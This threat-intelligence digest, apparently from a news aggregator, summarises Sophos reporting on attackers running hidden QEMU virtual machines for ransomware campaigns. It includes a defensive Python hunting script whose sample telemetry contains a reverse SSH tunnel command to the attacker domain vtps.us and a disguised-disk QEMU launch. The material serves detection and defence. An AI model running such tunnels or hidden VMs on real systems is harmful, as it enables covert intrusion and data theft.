Threat actors are increasingly abusing QEMU to launch hidden virtual machines on compromised Windows hosts, allowing credential theft, reconnaissance, command-and-control, data staging, and ransomware preparation to occur outside the visibility of many endpoint security tools. Sophos linked one campaign, STAC4713, to GOLD ENCOUNTER and the PayoutsKing ransomware operation, where attackers gained access through exposed SonicWall VPNs without MFA and exploitation of SolarWinds Web Help Desk CVE-2025-26399, then created a SYSTEM-level scheduled task such as TPMProfiler to start qemu-system-x86_64.exe, boot a disguised Alpine Linux virtual disk, and establish reverse SSH tunnels for covert access. Researchers said the hidden VM hosted tooling including AdaptixC2, Chisel, Rclone, and wg-obfuscator, enabling stealthy persistence and exfiltration while leaving limited forensic evidence on the host.
A second campaign, STAC3725, exploited CitrixBleed2 CVE-2025-5777, installed a malicious ScreenConnect client, created a rogue local administrator account, and used a QEMU-based VM to assemble offensive tooling such as Impacket, BloodHound.py, Kerbrute, KrbRelayX, NetExec, and Metasploit for post-compromise operations. Reporting also noted broader initial-access methods, including phishing and fake Microsoft Teams IT-support lures, and warned that adversaries may shift between QEMU and other virtualization or sideloading techniques while keeping the same objective of stealthy intrusion and ransomware enablement. Defenders were urged to hunt for unauthorized QEMU installations, suspicious SYSTEM scheduled tasks, unusual SSH tunneling or port forwarding, disguised virtual disk images, and related indicators including the domain vtps.us, while prioritizing MFA and patching for CVE-2025-26399 and CVE-2025-5777.
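The hunting guidance above (unauthorized QEMU execution, SYSTEM-context launches from scheduled tasks, disguised disk images, unusual SSH tunnelling, and the vtps.us domain) can be turned into a simple triage pass over exported process-creation telemetry. The following is an added example, not code from Sophos, Gurucul or Mallory. The only indicators taken from the reporting are the qemu-system binary name, the reverse-SSH behaviour and the domain vtps.us; the sample events, file paths, the `svchost.exe`-as-parent heuristic for scheduled-task launches, and the "disguised image" heuristic (a disk image argument whose extension is not a usual VM image extension) are assumptions made for illustration.

```python
"""Triage process-creation records for the QEMU-abuse pattern described in the
Sophos reporting. Added example; sample data below is constructed."""
import re
from dataclasses import dataclass

# Indicators from the reporting: the qemu-system binary, a disk image on the
# command line, reverse SSH tunnelling (ssh -R), and the domain vtps.us.
QEMU_RE = re.compile(r"qemu-system-[a-z0-9_]+\.exe", re.IGNORECASE)
IMAGE_ARG_RE = re.compile(r"(?:-hda\s+|-cdrom\s+|file=)([^\s,]+)", re.IGNORECASE)
KNOWN_IMAGE_EXT = (".qcow2", ".img", ".iso", ".raw", ".vmdk", ".vdi")
IOC_DOMAINS = ("vtps.us",)
SYSTEM_USER = "NT AUTHORITY\\SYSTEM"


@dataclass
class ProcEvent:
    """Minimal process-creation record (e.g. from Sysmon Event ID 1 or EDR export)."""
    user: str
    image: str          # full path of the executable that started
    parent_image: str   # full path of the parent process
    command_line: str


def assess(ev: ProcEvent) -> list[str]:
    """Return the list of hunt reasons that fire for one event (empty if clean)."""
    reasons: list[str] = []
    cl = ev.command_line
    if QEMU_RE.search(ev.image) or QEMU_RE.search(cl):
        reasons.append("qemu_execution")           # any QEMU launch is worth review
        if ev.user.upper() == SYSTEM_USER.upper():
            reasons.append("system_context")       # SYSTEM running a hypervisor
        # Assumption: a scheduled-task launch shows svchost.exe as the parent.
        if ev.parent_image.lower().endswith("svchost.exe"):
            reasons.append("scheduled_task_parent")
        # Assumption: an attached image whose extension is not a normal VM image
        # extension is treated as a disguised disk image.
        for m in IMAGE_ARG_RE.finditer(cl):
            if not m.group(1).lower().endswith(KNOWN_IMAGE_EXT):
                reasons.append("disguised_disk_image")
                break
    if ev.image.lower().endswith("ssh.exe") and re.search(r"\s-R\s", cl):
        reasons.append("ssh_reverse_tunnel")       # remote port forward back to the host
    if any(d in cl.lower() for d in IOC_DOMAINS):
        reasons.append("known_ioc_domain")
    return reasons


def hunt(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> reasons, keeping only events that fired at least once."""
    return {i: r for i, ev in enumerate(events) if (r := assess(ev))}


# Constructed sample telemetry (not from the reporting). Paths and user names are made up.
SAMPLE_EVENTS = [
    ProcEvent(SYSTEM_USER,
              r"C:\ProgramData\Cache\qemu-system-x86_64.exe",
              r"C:\Windows\System32\svchost.exe",
              r'"C:\ProgramData\Cache\qemu-system-x86_64.exe" -m 2048 '
              r"-drive file=C:\ProgramData\Cache\tpmcache.dat,format=qcow2 -nographic"),
    ProcEvent(r"CORP\alice",
              r"C:\Program Files\qemu\qemu-system-x86_64.exe",
              r"C:\Windows\explorer.exe",
              r'"C:\Program Files\qemu\qemu-system-x86_64.exe" -hda C:\VMs\alpine.qcow2 -m 1024'),
    ProcEvent(SYSTEM_USER,
              r"C:\Windows\System32\OpenSSH\ssh.exe",
              r"C:\Windows\System32\svchost.exe",
              "ssh.exe -N -R 2222:127.0.0.1:22 tunnel@vtps.us"),
    ProcEvent(r"CORP\alice",
              r"C:\Windows\System32\notepad.exe",
              r"C:\Windows\explorer.exe",
              "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(reasons)}")
```

The interactive developer launch (event 1) still fires `qemu_execution`, which is intended: the reporting asks defenders to hunt for unauthorized QEMU installations, so an allowlist of approved users or install paths belongs in the triage step rather than in the detection itself. The SYSTEM launch with a `.dat` disk image from a `svchost.exe` parent (event 0) is the shape of the scheduled-task pattern described above.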

Timeline of 4 events, from the most recent confirmed update back to the earliest known activity:
On April 22, 2026, Gurucul published a high-severity threat notice on QEMU abuse as a living-off-the-land technique. The notice included indicators of compromise such as the domain vtps.us, IP addresses, file hashes, and detection queries tied to the reported activity.
On April 16, 2026, Sophos published research describing a growing trend of threat actors abusing QEMU to run hidden virtual machines on compromised hosts. The report detailed the STAC4713 and STAC3725 campaigns, their tooling, access methods, and detection recommendations.
Sophos reported that the STAC3725 campaign was first seen in February 2026. The campaign used CitrixBleed2 (CVE-2025-5777) for initial access, deployed a malicious ScreenConnect client, and used a QEMU VM to build and run attacker tooling.
Sophos said the STAC4713 campaign was first observed in November 2025. The activity was linked to the PayoutsKing ransomware operation and involved using QEMU-based hidden virtual machines for stealthy post-compromise operations.
Sources (5 references tracked):
- community.gurucul.com
- scworld.com
- cybersecuritynews.com
- securityaffairs.com
- sophos.com